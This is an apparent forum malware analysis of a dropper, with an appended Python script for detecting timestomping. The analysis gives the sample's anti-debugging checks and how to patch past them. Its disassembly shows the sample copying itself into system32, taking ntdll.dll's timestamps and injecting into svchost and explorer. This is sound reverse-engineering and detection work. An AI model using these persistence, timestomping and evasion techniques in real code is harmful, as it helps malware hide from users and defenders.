Nice sample. And it has a few anti-debugging tricks.
1. It keeps looking up the program's menu and window items. Since the program itself has no menu or window, a menu window only exists when it is run inside a debugger such as OD or WinDbg, so it uses this to detect debugging. Getting past this check isn't hard either:

77DA6BF0 > 8BFF mov edi,edi
77DA6BF2 55 push ebp
77DA6BF3 8BEC mov ebp,esp
77DA6BF5 8B45 08 mov eax,dword ptr ss:[ebp+8]
77DA6BF8 85C0 test eax,eax
77DA6BFA 0F84 21180000 je advapi32.77DA8421
77DA6C00 3D 00000080 cmp eax,80000000
77DA6C05 0F84 2AE50100 je advapi32.77DC5135
77DA6C0B 3D 01000080 cmp eax,80000001
77DA6C10 0F84 1FE50100 je advapi32.77DC5135
77DA6C16 3D 02000080 cmp eax,80000002
77DA6C1B 0F84 14E50100 je advapi32.77DC5135
77DA6C21 3D 04000080 cmp eax,80000004
77DA6C26 0F84 09E50100 je advapi32.77DC5135
77DA6C2C 3D 50000080 cmp eax,80000050
77DA6C31 0F84 FEE40100 je advapi32.77DC5135
77DA6C37 3D 60000080 cmp eax,80000060
77DA6C3C 0F84 F3E40100 je advapi32.77DC5135
77DA6C42 3D 03000080 cmp eax,80000003
77DA6C47 0F84 E8E40100 je advapi32.77DC5135
77DA6C4D 3D 05000080 cmp eax,80000005
77DA6C52 0F84 DDE40100 je advapi32.77DC5135
77DA6C58 3D 06000080 cmp eax,80000006
77DA6C5D 0F84 D2E40100 je advapi32.77DC5135
77DA6C63 A8 01 test al,1
77DA6C65 0F85 F6F50200 jnz advapi32.77DD6261 // patch to NOP
77DA6C6B 8D45 08 lea eax,dword ptr ss:[ebp+8]
77DA6C6E 50 push eax
77DA6C6F E8 04FFFFFF call advapi32.77DA6B78
77DA6C74 5D pop ebp
77DA6C75 C2 0400 retn 4
Just change the spot marked above to NOP. After the patch you can keep debugging the program.
2. The second anti-debug check is basically negligible for today's OD:

00404044 FF15 62564000 call dword ptr ds:[<&KERNEL32.IsDebuggerPres>; kernel32.IsDebuggerPresent

Just set the returned eax to 0.
I'd also like to point out a mistake by the OP (or maybe I misunderstood what the OP meant).
C:\WINDOWS\system32\msxslt3.exe is actually not a new file; the program simply copies itself to that path.
The code is as follows:

004010B3 |. 8D85 E4FEFFFF lea eax,dword ptr ss:[ebp-11C]
004010B9 |. 50 push eax ; /String2
004010BA |. 8D85 E0FDFFFF lea eax,dword ptr ss:[ebp-220] ; |
004010C0 |. 50 push eax ; |String1
004010C1 |. FF15 30464000 call dword ptr ds:[404630] ; \lstrcmpiA
004010C7 |. 85C0 test eax,eax
004010C9 |. 0F84 CA000000 je load.00401199
004010CF |. 53 push ebx
004010D0 |. 8D85 E4FEFFFF lea eax,dword ptr ss:[ebp-11C]
004010D6 |. 50 push eax ; /FileName
004010D7 |. FF15 50464000 call dword ptr ds:[404650] ; \DeleteFileA
004010DD |. 57 push edi ; /FailIfExists => FALSE
004010DE |. 8D85 E4FEFFFF lea eax,dword ptr ss:[ebp-11C] ; |
004010E4 |. 50 push eax ; |NewFileName
004010E5 |. 8D85 E0FDFFFF lea eax,dword ptr ss:[ebp-220] ; |
004010EB |. 50 push eax ; |ExistingFileName
004010EC |. FF15 6C464000 call dword ptr ds:[40466C] ; \CopyFileA
004010F2 |. 6A 24 push 24 ; /FileAttributes = SYSTEM|ARCHIVE
004010F4 |. 8D85 E4FEFFFF lea eax,dword ptr ss:[ebp-11C] ; |
004010FA |. 50 push eax ; |FileName
004010FB |. FF15 68464000 call dword ptr ds:[404668] ; \SetFileAttributesA
00401101 |. 57 push edi ; /hTemplateFile => NULL
00401102 |. 57 push edi ; |Attributes => 0
00401103 |. 6A 03 push 3 ; |Mode = OPEN_EXISTING
00401105 |. 57 push edi ; |pSecurity => NULL
00401106 |. 6A 01 push 1 ; |ShareMode = FILE_SHARE_READ
00401108 |. 68 00000040 push 40000000 ; |Access = GENERIC_WRITE
0040110D |. 8D85 E4FEFFFF lea eax,dword ptr ss:[ebp-11C] ; |
00401113 |. 50 push eax ; |FileName
00401114 |. FF15 54464000 call dword ptr ds:[404654] ; \CreateFileA
0040111A |. 8BD8 mov ebx,eax
0040111C |. 83FB FF cmp ebx,-1
0040111F |. 74 74 je short load.00401195
00401121 |. 56 push esi ; /BufSize => 104 (260.)
00401122 |. 8D85 E0FDFFFF lea eax,dword ptr ss:[ebp-220] ; |
00401128 |. 50 push eax ; |Buffer
00401129 |. FF15 94304000 call dword ptr ds:[403094] ; \GetSystemDirectoryA
0040112F |. 68 24314000 push load.00403124 ; /StringToAdd = "\ntdll.dll"
00401134 |. 8D85 E0FDFFFF lea eax,dword ptr ss:[ebp-220] ; |
0040113A |. 50 push eax ; |ConcatString
0040113B |. FF15 A0304000 call dword ptr ds:[4030A0] ; \lstrcatA
00401141 |. 57 push edi ; /hTemplateFile => NULL
00401142 |. 57 push edi ; |Attributes => 0
00401143 |. 6A 03 push 3 ; |Mode = OPEN_EXISTING
00401145 |. 57 push edi ; |pSecurity => NULL
00401146 |. 6A 03 push 3 ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
00401148 |. 68 00000080 push 80000000 ; |Access = GENERIC_READ
0040114D |. 8D85 E0FDFFFF lea eax,dword ptr ss:[ebp-220] ; |
00401153 |. 50 push eax ; |FileName
00401154 |. FF15 54464000 call dword ptr ds:[404654] ; \CreateFileA
0040115A |. 8BF0 mov esi,eax
0040115C |. 83FE FF cmp esi,-1
0040115F |. 74 2D je short load.0040118E
00401161 |. 8D45 F0 lea eax,dword ptr ss:[ebp-10]
00401164 |. 50 push eax ; /pLastWrite
00401165 |. 8D45 E8 lea eax,dword ptr ss:[ebp-18] ; |
00401168 |. 50 push eax ; |pLastAccess
00401169 |. 8D45 F8 lea eax,dword ptr ss:[ebp-8] ; |
0040116C |. 50 push eax ; |pCreationTime
0040116D |. 56 push esi ; |hFile
0040116E |. FF15 60464000 call dword ptr ds:[404660] ; \GetFileTime
00401174 |. 8D45 F0 lea eax,dword ptr ss:[ebp-10]
00401177 |. 50 push eax ; /pLastWrite
00401178 |. 8D45 E8 lea eax,dword ptr ss:[ebp-18] ; |
0040117B |. 50 push eax ; |pLastAccess
0040117C |. 8D45 F8 lea eax,dword ptr ss:[ebp-8] ; |
0040117F |. 50 push eax ; |pCreationTime
00401180 |. 53 push ebx ; |hFile
00401181 |. FF15 7C464000 call dword ptr ds:[40467C] ; \SetFileTime
00401187 |. 56 push esi ; /hObject
00401188 |. FF15 08464000 call dword ptr ds:[404608] ; \CloseHandle
0040118E |> 53 push ebx ; /hObject
0040118F |. FF15 08464000 call dword ptr ds:[404608] ; \CloseHandle
What the code above does is this:
It compares whether the current run path is C:\WINDOWS\system32\msxslt3.exe; if not, it deletes any existing file at that path, copies itself there, and sets the copy's timestamps to be the same as ntdll.dll's.
Last comes the process injection; the processes it injects into are svchost.exe and explorer.exe.
[ This post was last edited by bugman on 2009-10-2 13:45 ]
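An added triage example, not from the post or the sample: the listing above shows the drop receiving ntdll.dll's creation/access/write FILETIMEs via GetFileTime/SetFileTime, so on an infected host the dropped PE carries timestamps identical to ntdll.dll's while its content is a copy of the running sample. The script below turns that into two checks: find PE-looking files whose timestamps equal a reference file's exactly but whose hash differs (timestomping), and confirm a drop is byte-identical to its source. Names and layout are assumptions: the fixture directory stands in for system32 and is constructed in a temp folder so it runs offline on any OS, the sample is called load.exe after the module name in the listing, and only the portable access/modification times are compared (POSIX stat has no creation time). On a live Windows host you would point find_timestomped() at C:\Windows\System32 instead.

```python
"""Timestomp and self-copy checks for the dropper behaviour analysed above.

Added example; not code from the post or the sample. The directory layout is
constructed with os.utime so the script runs offline anywhere.
"""
import hashlib
import os
import tempfile

REFERENCE = "ntdll.dll"   # the file whose FILETIMEs the sample clones onto its drop


def file_times(path):
    """Access and modification time in nanoseconds: the portable part of the
    FILETIME triple that GetFileTime/SetFileTime move around."""
    st = os.stat(path)
    return (st.st_atime_ns, st.st_mtime_ns)


def sha256(path):
    """Content hash, so a cloned timestamp is only flagged on a *different* file."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def find_timestomped(directory, reference=REFERENCE, exts=(".exe", ".dll")):
    """Return PE-looking files in `directory` whose atime and mtime equal the
    reference file's exactly but whose content differs from it. Two unrelated
    files sharing timestamps down to the tick is not something a normal
    install produces, so every hit deserves a look."""
    ref_path = os.path.join(directory, reference)
    ref_times = file_times(ref_path)
    ref_hash = sha256(ref_path)
    hits = []
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        if not os.path.isfile(path) or not name.lower().endswith(exts):
            continue
        if name.lower() == reference.lower():
            continue
        if file_times(path) == ref_times and sha256(path) != ref_hash:
            hits.append(name)
    return hits


def is_self_copy(original, dropped):
    """The post notes the drop is a copy of the running sample, not a new file;
    byte-identical content confirms that (CopyFileA does not alter the bytes)."""
    return sha256(original) == sha256(dropped)


def build_fixture():
    """Constructed layout standing in for system32 (assumed names): a fake
    ntdll.dll, a DLL with its own times, the original sample, and the drop with
    ntdll.dll's times cloned onto it the way the sample's SetFileTime call does."""
    d = tempfile.mkdtemp(prefix="timestomp_")

    def write(name, body, times_ns):
        p = os.path.join(d, name)
        with open(p, "wb") as f:
            f.write(b"MZ" + b"\x00" * 62 + body)   # minimal PE-looking header
        os.utime(p, ns=times_ns)                   # (atime_ns, mtime_ns)
        return p

    ntdll_times = (1_230_000_000_000_000_000, 1_230_500_000_000_000_000)
    other_times = (1_231_000_000_000_000_000, 1_231_500_000_000_000_000)
    write("ntdll.dll", b"fake ntdll body", ntdll_times)
    write("kernel32.dll", b"fake kernel32 body", other_times)
    sample = write("load.exe", b"dropper payload", other_times)
    drop = write("msxslt3.exe", b"dropper payload", ntdll_times)  # stomped copy
    return d, sample, drop


def run_demo():
    """Build the fixture and return (timestomped names, self-copy verdict)."""
    d, sample, drop = build_fixture()
    return find_timestomped(d), is_self_copy(sample, drop)


if __name__ == "__main__":
    hits, same = run_demo()
    print("timestomped:", hits, "| drop is a copy of the sample:", same)
```

Whole-second fixture times are used on purpose so the equality check survives filesystems that truncate sub-second precision; on a real host the comparison is still exact, since the sample copies all three FILETIMEs verbatim.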